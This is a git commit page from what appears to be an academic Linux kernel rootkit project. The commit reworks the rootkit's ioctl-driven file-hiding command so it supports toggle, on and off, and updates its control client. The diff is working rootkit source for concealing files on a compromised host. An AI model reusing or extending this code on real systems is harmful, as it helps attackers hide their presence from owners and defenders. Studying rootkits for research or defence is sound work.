linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit e884f82e538738d503e651f77edc6e56a896951f
parent 78d60743f7d078d219f8d01dfefd43b664f1105c
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 08:52:48 +0100

implements filehide {toggle,on,off} for arg{=0,>0,<0}

Diffstat:

Msrc/channel.c | 16++++++++++++----


Msrc/g7.c | 2+-


Msrc/rkctl/rkctl.c | 4++--


Msrc/rkctl/rkctl.h | 2+-


4 files changed, 16 insertions(+), 8 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -39,6 +39,9 @@ detect_channel(unsigned cmd)
 int
 handle_ping(unsigned long arg)
 {
+    if (!(const char *)arg)
+        return -ENOTTY;
+
     copy_from_user(buf, (const char *)arg, BUFLEN);
     if (!strcmp("PING", buf)) {
         buf[1] = 'O';
@@ -51,14 +54,19 @@ handle_ping(unsigned long arg)
 int
 handle_filehide(unsigned long arg)
 {
-    bool set;
+    long sarg = (long)arg;
+    bool set = rootkit.hiding_files;
 
-    if ((set = rootkit.hiding_files ^= 1))
+    if (sarg > 0 || !sarg && (set ^ 1)) {
         hide_files();
-    else
+        rootkit.hiding_files = 1;
+    } else if (sarg < 0 || !sarg && !(set ^ 1)) {
         unhide_files();
+        rootkit.hiding_files = 0;
+    }
 
-    DEBUG_NOTICE("filehide toggled %s", set ? "on" : "off");
+    DEBUG_NOTICE("filehide toggled %s",
+            rootkit.hiding_files ? "on" : "off");
 
     return 0;
 }
diff --git a/src/g7.c b/src/g7.c
@@ -81,7 +81,7 @@ g7_ioctl(struct file *_file, unsigned cmd, unsigned long arg)
     channel_t c = detect_channel(cmd);
     DEBUG_NOTICE("[g7_ioctl] on %#10x (%s)\n", cmd, c.name);
 
-    if (((const char *)arg) && c.handler)
+    if (c.handler)
         return c.handler(arg);
     else
         return -ENOTTY;
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -75,7 +75,7 @@ handle_ping(void *arg)
 int
 handle_filehide(void *arg)
 {
-    return issue_ioctl(G7_FILEHIDE, (char *)arg);
+    return issue_ioctl(G7_FILEHIDE, (const char *)arg);
 }
 
 int
@@ -94,7 +94,7 @@ handle_hidepid(void *arg)
 }
 
 int
-issue_ioctl(unsigned long request, char *argp)
+issue_ioctl(unsigned long request, const char *argp)
 {
     int fd;
     char device[BUFLEN];
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -17,7 +17,7 @@ typedef struct {
 } cmd_t;
 
 cmd_t parse_input(int, char **);
-int issue_ioctl(unsigned long, char *);
+int issue_ioctl(unsigned long, const char *);
 void help();
 
 int handle_ping(void *);